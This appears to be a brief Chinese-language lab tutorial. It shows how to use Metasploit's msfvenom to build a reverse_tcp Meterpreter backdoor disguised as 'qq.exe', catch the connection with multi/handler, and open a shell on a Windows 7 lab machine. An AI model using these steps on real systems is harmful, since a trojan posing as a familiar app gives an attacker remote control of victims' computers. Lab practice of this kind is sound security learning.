0X01簡介 這里我本來想學習 msf利用漏洞反彈shell的 但是 沒有靶機....等找了靶機在弄吧
kali 172.18.5.118
靶機 172.18.5.240
先嘗試能不能ping通
好的可以 那我們進行下一步
0X01愛之初體驗
先在kali終端輸入msfvenom -l,打開payload目錄
然后找到payload windows/meterpreter/reverse_tcp
輸入以下命令生成后門qq.exe
然后將生成的qq.exe移到靶機中,然后打開msfconsole
使用該攻擊模塊監聽 use exploit/multi/handler
然后設置payload
在show options 發現還有未設置的
設置LHOST為kali地址
然后run開始監聽
這時我們打開靶機的qq.exe文件就能看到Kali這邊獲取到一個Session
輸入jobs退出,繼續輸入sessions -l查看session列表
這里有一個session列表,sessionid為1
我們輸入sessions -i 1,與該session交互
輸入getuid查看用戶信息
輸入systinfo獲取系統信息
輸入shell即可獲取win7的shell
不過用這樣方式拿的shell普遍都是很低的,還需提權